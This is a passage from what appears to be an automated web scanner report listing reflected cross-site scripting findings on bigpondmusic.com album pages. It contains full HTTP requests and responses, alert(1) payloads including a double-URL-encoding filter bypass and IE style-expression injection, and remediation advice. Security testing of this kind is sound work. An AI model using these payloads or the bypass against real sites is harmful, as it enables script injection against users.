The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e9b9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e81b0a7b047a was submitted in the REST URL parameter 1. This input was echoed as 9e9b9"><script>alert(1)</script>81b0a7b047a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album9e9b9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e81b0a7b047a/keith-urban/get-closer3 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88248


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album9e9b9"><script>alert(1)</script>81b0a7b047a/keith-urban/get-closer3" />
...[SNIP]...

2.83. http://bigpondmusic.com/album/keith-urban/get-closer3 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/keith-urban/get-closer3

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aedb7"style%3d"x%3aexpression(alert(1))"7aaa14c0b57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aedb7"style="x:expression(alert(1))"7aaa14c0b57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/keith-urban/get-closer3?aedb7"style%3d"x%3aexpression(alert(1))"7aaa14c0b57=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 116006


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Keith Urban - Get Closer - B
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/keith-urban/get-closer3?aedb7"style="x:expression(alert(1))"7aaa14c0b57=1" />
...[SNIP]...

2.84. http://bigpondmusic.com/album/kings-of-leon/come-around-sundown [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/kings-of-leon/come-around-sundown

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef448%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb1a2ebf5bfd was submitted in the REST URL parameter 1. This input was echoed as ef448"><script>alert(1)</script>b1a2ebf5bfd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumef448%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb1a2ebf5bfd/kings-of-leon/come-around-sundown HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88278


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumef448"><script>alert(1)</script>b1a2ebf5bfd/kings-of-leon/come-around-sundown" />
...[SNIP]...

2.85. http://bigpondmusic.com/album/kings-of-leon/come-around-sundown [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/kings-of-leon/come-around-sundown

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee02b'%3be0cb5b4004e was submitted in the REST URL parameter 1. This input was echoed as ee02b';e0cb5b4004e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumee02b'%3be0cb5b4004e/kings-of-leon/come-around-sundown HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88250


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumee02b';e0cb5b4004e';
   s.prop4 = 'kings-of-leon';
   s.prop5 = 'come-around-sundown';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' +
...[SNIP]...

2.86. http://bigpondmusic.com/album/kings-of-leon/come-around-sundown [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/kings-of-leon/come-around-sundown

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 111ac"style%3d"x%3aexpression(alert(1))"f8333a80ae5 was submitted in the h parameter. This input was echoed as 111ac"style="x:expression(alert(1))"f8333a80ae5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/kings-of-leon/come-around-sundown?h=756194845111ac"style%3d"x%3aexpression(alert(1))"f8333a80ae5 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123596


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Kings Of Leon - Come Around
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/kings-of-leon/come-around-sundown?h=756194845111ac"style="x:expression(alert(1))"f8333a80ae5" />
...[SNIP]...

2.87. http://bigpondmusic.com/album/kings-of-leon/come-around-sundown [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/kings-of-leon/come-around-sundown

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7da47"style%3d"x%3aexpression(alert(1))"9e1191b4fee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7da47"style="x:expression(alert(1))"9e1191b4fee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/kings-of-leon/come-around-sundown?7da47"style%3d"x%3aexpression(alert(1))"9e1191b4fee=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123679


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Kings Of Leon - Come Around
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/kings-of-leon/come-around-sundown?7da47"style="x:expression(alert(1))"9e1191b4fee=1" />
...[SNIP]...

2.88. http://bigpondmusic.com/album/mando-diao/mtv-unplugged-above-and-beyond [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/mando-diao/mtv-unplugged-above-and-beyond

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd9a3'%3b41e6347e7d8 was submitted in the REST URL parameter 1. This input was echoed as dd9a3';41e6347e7d8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumdd9a3'%3b41e6347e7d8/mando-diao/mtv-unplugged-above-and-beyond HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87907


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumdd9a3';41e6347e7d8';
   s.prop4 = 'mando-diao';
   s.prop5 = 'mtv-unplugged-above-and-beyond';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop
...[SNIP]...

2.89. http://bigpondmusic.com/album/mando-diao/mtv-unplugged-above-and-beyond [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/mando-diao/mtv-unplugged-above-and-beyond

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34330%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec8207af3af2 was submitted in the REST URL parameter 1. This input was echoed as 34330"><script>alert(1)</script>c8207af3af2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album34330%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec8207af3af2/mando-diao/mtv-unplugged-above-and-beyond HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88075


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album34330"><script>alert(1)</script>c8207af3af2/mando-diao/mtv-unplugged-above-and-beyond" />
...[SNIP]...

2.90. http://bigpondmusic.com/album/mando-diao/mtv-unplugged-above-and-beyond [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/mando-diao/mtv-unplugged-above-and-beyond

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10ec8"style%3d"x%3aexpression(alert(1))"5d723e85314 was submitted in the h parameter. This input was echoed as 10ec8"style="x:expression(alert(1))"5d723e85314 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/mando-diao/mtv-unplugged-above-and-beyond?h=76630773610ec8"style%3d"x%3aexpression(alert(1))"5d723e85314 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:26:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 126887


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Mando Diao - MTV Unplugged -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/mando-diao/mtv-unplugged-above-and-beyond?h=76630773610ec8"style="x:expression(alert(1))"5d723e85314" />
...[SNIP]...

2.91. http://bigpondmusic.com/album/mando-diao/mtv-unplugged-above-and-beyond [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/mando-diao/mtv-unplugged-above-and-beyond

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69935"style%3d"x%3aexpression(alert(1))"58a70fee747 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69935"style="x:expression(alert(1))"58a70fee747 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/mando-diao/mtv-unplugged-above-and-beyond?69935"style%3d"x%3aexpression(alert(1))"58a70fee747=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:26:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 126980


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Mando Diao - MTV Unplugged -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/mando-diao/mtv-unplugged-above-and-beyond?69935"style="x:expression(alert(1))"58a70fee747=1" />
...[SNIP]...

2.92. http://bigpondmusic.com/album/massive-attack/atlas-air-ep [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/massive-attack/atlas-air-ep

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3413%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecef7e926d6b was submitted in the REST URL parameter 1. This input was echoed as c3413"><script>alert(1)</script>cef7e926d6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumc3413%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecef7e926d6b/massive-attack/atlas-air-ep HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88125


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumc3413"><script>alert(1)</script>cef7e926d6b/massive-attack/atlas-air-ep" />
...[SNIP]...

2.93. http://bigpondmusic.com/album/massive-attack/atlas-air-ep [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/massive-attack/atlas-air-ep

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9b33'%3ba641b115d06 was submitted in the REST URL parameter 1. This input was echoed as d9b33';a641b115d06 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumd9b33'%3ba641b115d06/massive-attack/atlas-air-ep HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
